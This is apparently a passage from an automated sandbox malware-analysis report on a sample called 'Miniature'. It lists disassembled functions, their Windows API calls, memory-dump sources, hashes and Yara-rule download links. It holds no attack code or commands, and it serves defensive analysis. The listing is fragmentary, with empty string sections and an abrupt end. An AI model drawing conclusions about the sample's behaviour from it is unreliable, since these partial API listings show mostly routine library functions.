                                                                                                                                                                                                                                                                                            • Instruction ID: fddbe6bd913d804adda99ff177c950b6ed3597eb3af7cd02133aa46490a9e480
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67f06e35a37c32cbf0351caa622a7f3f446b1116e465d1cae0958bed4913480d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B701FCB2A7F3516EA62427B5BDC676F2F94EB46775F20032AF122850F0EF515E016144
                                                                                                                                                                                                                                                                                            Function 00C430E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00C34D53,00000000,?,?,00C368E2,?,?,00000000), ref: 00C430EB
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4311E
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43146
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00C43153
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00C4315F
                                                                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 00C43165
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4c6d406b1fca2a30b766e6e6363f32398065ca17de1fd4bf034143e0d9c22a20
                                                                                                                                                                                                                                                                                            • Instruction ID: bff66bba5bed4b8d50e80b2e1962703375019ad185876b516df77c3c7b636db6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c6d406b1fca2a30b766e6e6363f32398065ca17de1fd4bf034143e0d9c22a20
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5F0F63694568127D6127735AC0BB6E277ABFC1770B250425FE36D32E2EF248F02A171
                                                                                                                                                                                                                                                                                            Function 00CA9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C11F87
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: SelectObject.GDI32(?,00000000), ref: 00C11F96
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: BeginPath.GDI32(?), ref: 00C11FAD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: SelectObject.GDI32(?,00000000), ref: 00C11FD6
                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00CA94AA
                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00CA94BE
                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00CA94CC
                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00CA94DC
                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 00CA94EC
                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 00CA94FC
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b3400f947607c4d82a9213101f2f8e6fff3976f4d601537a0c5f9965a934e97b
                                                                                                                                                                                                                                                                                            • Instruction ID: e54608d8ee17daba0e928552cdfd75f1cc36c18d1eb2e05442760e1de864b40c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3400f947607c4d82a9213101f2f8e6fff3976f4d601537a0c5f9965a934e97b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6711DB7600014DBFDF129F90DC89F9E7F6DEB09364F048011BA1A5A1A1C7719E56DBA0
                                                                                                                                                                                                                                                                                            Function 00C75B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C75B7C
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C75B8D
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C75B94
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C75B9C
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C75BB3
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C75BC5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9b00d52fd8a84efefece0b31526c49d94b2ffdbd24146264a595eda555f183a0
                                                                                                                                                                                                                                                                                            • Instruction ID: 38c49c0cb523ca3d2e5e0da770deea7b5c372263287c2bbaf1f290d8c8b56a75
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b00d52fd8a84efefece0b31526c49d94b2ffdbd24146264a595eda555f183a0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16016275E00718BBEB109FA59C49F9EBFB8EF49751F108065FA0AA7280D6709D01CFA0
                                                                                                                                                                                                                                                                                            Function 00C1327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C132AF
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C132B7
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C132C2
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C132CD
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C132D5
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C132DD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cf85a452a1549002eb5797ee8a92d3af83e93f1410517154a8dd451234ffaced
                                                                                                                                                                                                                                                                                            • Instruction ID: 76fb2e051d1f0b4018db7ac354c396cc03e942ac4dd0d7cd1dc5d00a01a3f80c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf85a452a1549002eb5797ee8a92d3af83e93f1410517154a8dd451234ffaced
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 590167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                                                                            Function 00C7F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C7F447
                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C7F45D
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00C7F46C
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7F47B
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7F485
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7F48C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 21ae901e47b63387ca7dbf4af84f8af7747645c8c606241d2f072141e2383f87
                                                                                                                                                                                                                                                                                            • Instruction ID: 5ad489e9197a14ae1dcdc078d7e3480d4ba7256c890a6eaefd1d8b89743cfce0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21ae901e47b63387ca7dbf4af84f8af7747645c8c606241d2f072141e2383f87
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6F01D32241158BBE72157529C0EFEF3A7CEBC7B15F000058F6079209097A05A02C6B5
                                                                                                                                                                                                                                                                                            Function 00C534D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?), ref: 00C534EF
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C53506
                                                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 00C53512
                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00C53521
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00C53533
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000005), ref: 00C5354D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 56e1160c314718408336a1c55904249253a969f15570666e0cb796c2b5b2cf84
                                                                                                                                                                                                                                                                                            • Instruction ID: b511594e85e17bad02c1337d2607daea68b09c9a7680773081e203a429a0b241
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56e1160c314718408336a1c55904249253a969f15570666e0cb796c2b5b2cf84
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9014671500245EFDB505FA4DC08BEE7BB5FB0A326F500560FA2BA35A1DB321E91AF10
                                                                                                                                                                                                                                                                                            Function 00C721C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C721CC
                                                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00C721D8
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C721E1
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C721E9
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C721F2
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C721F9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e3fea5118bef6aa7e9fa9b7532338b125dd001093cc284733a5dcdefa6ffd3ee
                                                                                                                                                                                                                                                                                            • Instruction ID: 0ea3e94fb5987e2002ae6e440a569ebf2997cd32ed8c9bfa21352f180dfe6ccb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3fea5118bef6aa7e9fa9b7532338b125dd001093cc284733a5dcdefa6ffd3ee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AE05276104505BBDB011BA5EC0DB8EBF79FB4A726B504625F22783874CB329461DB51
                                                                                                                                                                                                                                                                                            Function 00C7CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C141EA: _wcslen.LIBCMT ref: 00C141EF
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C7CF99
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7CFE0
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C7D047
                                                                                                                                                                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C7D075
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 51e7dca285ebe3169a4d0f45c3694802742f5f74f5fb0192fd259fbfeeaa6ab0
                                                                                                                                                                                                                                                                                            • Instruction ID: 8fa303ee792024c31f25d4f951832feca25a405fe2186db48d7ba7c22f64272f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e7dca285ebe3169a4d0f45c3694802742f5f74f5fb0192fd259fbfeeaa6ab0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C511F716043019BD714AF29C884BAFBBF8AF85314F048A2DF9AAD3190DB70CE459752
                                                                                                                                                                                                                                                                                            Function 00C9B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00C9B903
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C141EA: _wcslen.LIBCMT ref: 00C141EF
                                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 00C9B998
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9B9C7
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                                                                                                            • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                            • Opcode ID: c860f36ac27d7c67d3a7511ef29442e639cbb9e0b8c59eb976106ce773333474
                                                                                                                                                                                                                                                                                            • Instruction ID: 8ca0354d0ee34c40e30f8499b602488218376ab29a011f106a5ee9eb760a51e1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c860f36ac27d7c67d3a7511ef29442e639cbb9e0b8c59eb976106ce773333474
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96716775A00219EFCF10EF54D598A9EBBF4BF09310F048499E856AB391CB70EE85DB90
                                                                                                                                                                                                                                                                                            Function 00C77B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C77B6D
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C77BA3
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C77BB4
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C77C36
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                            • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                            • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                            • Opcode ID: 6500e696e9ac6c028b02ac3e6aabaa49cdfe109577f38fbd3e0e82b90a9379b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 61ebd7dfec8230a50d8ce5eb6570788ed6c63216a9b64592ec90957a6a074bb7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6500e696e9ac6c028b02ac3e6aabaa49cdfe109577f38fbd3e0e82b90a9379b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A84163B1604208DFDB16DF64D884B9A7BB9EF48314F14C1A9AD0ADF245D7B1DE44CBA0
                                                                                                                                                                                                                                                                                            Function 00CA4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA48D1
                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 00CA48E6
                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CA492E
                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00CA4941
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
